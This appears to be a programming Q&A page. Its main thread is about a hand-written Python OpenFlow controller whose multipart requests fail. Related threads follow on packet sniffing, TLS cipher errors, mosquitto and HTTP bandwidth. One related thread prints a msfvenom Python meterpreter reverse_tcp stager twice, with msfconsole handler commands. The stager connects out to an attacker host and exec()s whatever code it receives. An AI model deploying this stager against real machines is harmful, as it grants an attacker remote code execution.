Long story short, I have a project that requires me to create a controller from scratch in python and handle requests from switches created through a mininet topology following the Open Flow Protocol.
Helpful Open Flow Protocol resources:
https://www.opennetworking.org/wp-content/uploads/2014/10/openflow-switch-v1.5.1.pdf
http://flowgrammable.org/sdn/openflow/message-layer/
http://flowgrammable.org/sdn/openflow/message-layer/statsrequest/#ofp_1_3
My code is available here on github for cloning and full transparency:
[removed as of 10/12/2019, see my answer below]
The issue I am running into is that I am unable to send a multipart-request message for the port stats description (search PortDesc on this link). I do not know why this is the case, but when I view the packet data in wireshark I get a "Range is out of bounds" error. I haven't been able to figure out why this is the case. Here are a few screenshots of the packet data:
Wireshark captures:
Lua error messages:
Bad Request Error Message Response:
Something to note here is that the code says OFPBRC_BAD_LEN (6), but the length of bytes sent in the multi-part request are of size 16.
A classmate that sent their packet data correctly has said that they were using the same packing structure that I am, except theirs is successful (see the python struct documentation). I don't know what the issue could be with mine and I am running out of ideas to check. Any pointers would be greatly appreciated.
TL;DR: I am unable to send a multipart request and even though I am adhering to the request specifications, results keep returning with an error code. Error in wireshark says "Range out of bounds" and I do not know how else to structure my request to correct this error message.
I solved my problem, but I don't think I have an answer as to what the problem was. First I'll start with my solution, and then talk about what I believe the problem is.
Solution:
As you can see in the screenshots above, I was sending OpenFlow packets in the version 1.5 protocol, which is the newest version, but visiting openflow message layer documentation only shows documentation up to 1.4.
Ontop of that, the latest version of multipart request that the documentation shows is 1.3.1. Even when I send a multipart request for Open Flow Protocol version 1.5 it wasn't showing up as the OpenFlowProtocol, instead as a regular TCP packet. I did the following 3 things:
In my topology file, where I create the switch, I was initializing
the switches as s1 = self.addSwitch( 's1'). What I added to this
statement was the protocol parameter: s1 = self.addSwitch( 's1',
protocols='OpenFlow14').
For good measure I also added protocols specification to the
mininet command in the console: sudo mn --custom mytopo.py --topo
mytopo
--controller=remote,ipaddr=127.0.0.1,port=6653,protocols=OpenFlow14
I also changed how I was packing the requests, so instead of
specifying version 1.5 (which is a '06' in the packet header), I
packed it as 1.4 (which is a '05' in the packet header). req =
struct.pack('!BBHI',5,5,8,0) (ex. for the feature_request message
sent to the switch).
These steps solved the issue I was running into and I was able to get a stats_reply from the switch.
Problem (or what I think the problem is):
I believe the problem was that AS OF RIGHT NOW, Open Flow Version 1.5 doesn't have support yet for the multipart request, as evidenced by when sending a multipart request for the port description, it shows a regular TCP protocol instead of the OpenFlow protocol.
Related
For a script I am making, I need to be able to see the parameters that are sent with a request.
This is possible through Fiddler, but I am trying to automate the process.
Here are some screenshots to start with. As you can see in the first picture of Fiddler, I can see the URL of a request and the parameters sent with that request.
I tried to do some packet sniffing with scapy with the code below to see if I can get a similar result, but what I get is in the second picture. Basically, I can get the source and destination of a packet as ip addresses, but the packets themselves are just bytes.
def sniffer():
t = AsyncSniffer(prn = lambda x: x.summary(), count = 10)
t.start()
time.sleep(8)
results = t.results
print(len(results))
print(results)
print(results[0])
From my understanding, after we establish a TCP connection, the request is broken down into several IP packets and then sent over to the destination. I would like to be able to replicate the functionality of Fiddler, where I can see the url of the request and then the values of parameters being sent over.
Would it be feasible to recreate the information of a request through only the information gathered from the packets?
Or is this difference because the sniffing is done on Layer 2, and then maybe Fiddler operates on Layer 3/4 before/after the translation into IP packets is done, so it actually sees the content of the original request itself and the result of the combination of packets? If my understanding is wrong, please correct me.
Basically, my question boils down to: "Is there a python module I can use to replicate the features of Fiddler to identify the destination url of a request and the parameters sent along with that request?"
The sniffed traffic is HTTPS traffic - therefore just by sniffing you won't see any details on the HTTP request/response because it is encrypted via SSL/TLS.
Fiddler is a proxy with HTTPS interception, that is something totally different compared to sniffing traffic on network level. This means that for the client application Fiddler "mimics" the server and for the server Fiddler mimics the client. This allows Fiddler to decrypt the requests/responses and show them to you.
If you want to perform request interception on python level I would recommend to you to use mitmproxy instead of Fiddler. This proxy also can perform HTTPS interception but it is written in Python and therefore much easier to integrate in your Python environment.
Alternatively if you just want to see the request/response details of a Python program it may be easier to do so by setting the log-level in an appropriate way. See for example this question: Log all requests from the python-requests module
I have used msfvenom to create the following python payload:
import socket,struct
s=socket.socket(2,socket.SOCK_STREAM)
s.connect(('MY PUBLIC IP',3930))
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
d+=s.recv(l-len(d))
exec(d,{'s':s})
I have then opened up msfconsole, and done the following:
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set LHOST 192.168.0.186 (MY LOCAL IP)
set LPORT 3930
exploit
It begins the reverse TCP handler on 192.168.0.186:3930, and also starts the payload handler. However, when I run the script on another computer, the payload times out after waiting for about a minute, and msfconsole doesn't register anything. I have port forwarded 3930 on the router. What am I doing wrong here?
This is the code I would use for a reverse TCP on Unix systems, with the details you've provided. However, I stumbled upon your post after error searching, so this isn't 100% flawless. I've gotten it to work perfectly in the past, but just recently it's begun to lag. It'll run once on an internal system, but anything after that gives me the same error message you got. I also get the same message when doing this over the WAN, as opposed to LAN, however it doesn't run the first time around. What ISP do you have? It may be entirely dependent on that.
import socket,struct
s=socket.socket(2,1)
s.connect(('IP ADDRESS',3930))
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(4096)
while len(d)!=l:
d+=s.recv(4096)
exec(d,{'s':s})
I am trying to connect to a website with requests that requires using a client certificate.
import requests
r = requests.get(url, cert='path to cert')
print(r.status_code)
This works for one site that uses the same client cert. That server is using TLS_RSA_WITH_AES_128_CBC_SHA, TLS 1.0. However my target site uses TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA, TLS 1.1. So basically the difference is TLS 1 works and TLS 1.1 doesn't. Everything works fine in browser so it must have something to do with Python's SSL.
I am using requests version 2.7.0 and I have requests[security] installed as well. pip freeze:
cffi==0.9.2
cryptography==0.8.1
ndg-httpsclient==0.3.3
pyasn1==0.1.7
pycparser==2.10
pyOpenSSL==0.15.1
requests==2.7.0
six==1.9.0
The specific error I am getting is requests.exceptions.SSLError: [SSL: TLSV1_ALERT_INTERNAL_ERROR] tlsv1 alert internal error (_ssl.c:600). This is on Windows 7 with Python 3.4.3. Unfortunately this is on an internal machine so I am stuck with Windows and our internal mirror of PyPi does not have the latest versions of everything. It seems to me like this has something to do with ssl failing and not necessarily requests.
Google does not give back promising results. There is this StackOverflow post that describes the same problem, but the solution provided (using a custom adapter) does not work for me.
Hopefully someone else has run into this before and can give me some tips on how to fix it. Please and thanks.
EDIT: I did a wireshark capture of the interaction. The SSL alert sent back is "Level: Fatal (2) Description: Internal Error (80)". After the TCP connection start, my machine sends a client hello.
Content Type: Handshake (22)
Version: TLS 1.0 (0x0301)
Length: 512
Then the handshake protocol segment of that packet is
Handshake Type: Client Hello (1)
Length: 508
Version: TLS 1.2 (0x0301)
followed by a list of the supported cipher suites, etc. I looked in the list of cipher suites sent by my client and TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA is listed. The server ACKs this message then sends the Alert packet.
I got rid of an identical SSLError by removing the first entry ECDH+AESGCM from requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS, with which the server seemed to have problems. The line
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS = 'DH+AESGCM:ECDH+AES256:DH+AES256:ECDH+AES128:DH+AES:ECDH+HIGH:DH+HIGH:ECDH+3DES:DH+3DES:RSA+AESGCM:RSA+AES:RSA+HIGH:RSA+3DES:!aNULL:!eNULL:!MD5'
solved the problem for me.
For me, request.request('GET'... instead of request.get(... works.
And I got rid of the above SSLError by removing almost all the first entry:
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS = 'RSA+AESGCM:RSA+AES:RSA+HIGH:RSA+3DES:!aNULL:!eNULL:!MD5'
I have a mosquitto setup with max_inflight_messages=1 (for in-order delivery). A client connected to the broker is able to receive messages, but after it publishes a message with QoS=2, it no longer receives messages. This behavior was observed after changing the max_inflight_messages to 1 from the default value (previously, the client was able to receive messages following the publish)
This was also tested with a subscribe("/#"), to ensure it was not a subscribe error. Am I doing something wrong, or is this the expected behavior with max_inflight_messages=1?
Thank you for your help.
Sam
Having done a quick test, it does look like this might be a bug in mosquitto. If you submit a bug report at http://bugs.launchpad.net/mosquitto then it'll make sure the problem doesn't get forgotten.
In the meantime you can use max_inflight_messages at greater than 1. The in-order delivery is actually quite robust even with max_inflight_messages set>1. It's only likely to be a problem if your client is dropping messages in a particularly erratic manner, which is only likely to happen if your network is disconnecting frequently and the client is doing odd things.
Update: This is fixed for version 1.2.2.
I am using a server to send some piece of information to another server every second. The problem is that the other server response is few kilobytes and this consumes the bandwidth on the first server ( about 2 GB in an hour ). I would like to send the request and ignore the return ( not even receive it to save bandwidth ) ..
I use a small python script for this task using (urllib). I don't mind using any other tool or even any other language if this is going to make the request only.
A 5K reply is small stuff and is probably below the standard TCP window size of your OS. This means that even if you close your network connection just after sending the request and checking just the very first bytes of the reply (to be sure that request has been really received) probably the server already sent you the whole answer and the packets are already on the wire or on your computer.
If you cannot control (i.e. trim down) what is the server reply for your notification the only alternative I can think to is to add another server on the remote machine waiting for a simple command and doing the real request locally and just sending back to you the result code. This can be done very easily may be even just with bash/perl/python using for example netcat/wget locally.
By the way there is something strange in your math as Glenn Maynard correctly wrote in a comment.
For HTTP, you can send a HEAD request instead of GET or POST:
import urllib2
request = urllib2.Request('https://stackoverflow.com/q/5049244/')
request.get_method = lambda: 'HEAD' # override get_method
response = urllib2.urlopen(request) # make request
print response.code, response.url
Output
200 https://stackoverflow.com/questions/5049244/how-can-i-ignore-server-response-t
o-save-bandwidth
See How do you send a HEAD HTTP request in Python?
Sorry but this does not make much sense and is likely a violation of the HTTP protocol. I consider such an idea as weird and broken-by-design. Either make the remote server shut up or configure your application or whatever is running on the remote server on a different protocol level using a smarter protocol with less bandwidth usage. Everything else is hard being considered as nonsense.